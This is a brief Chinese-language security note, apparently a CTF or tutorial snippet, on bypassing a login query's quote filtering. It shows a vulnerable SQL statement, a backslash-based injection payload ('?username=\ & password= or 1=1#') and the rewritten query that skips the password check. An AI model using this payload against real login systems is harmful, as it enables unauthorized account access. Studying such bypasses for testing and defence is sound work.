过滤单引号但没过滤反斜杠

查询语句:

select * from users where username='$user' and password='$pass'
把单引号过滤为空

构造payload绕过:

?username=\ & password= or 1=1#
相当于
select * from users where username='\' and password=' or 1=1#'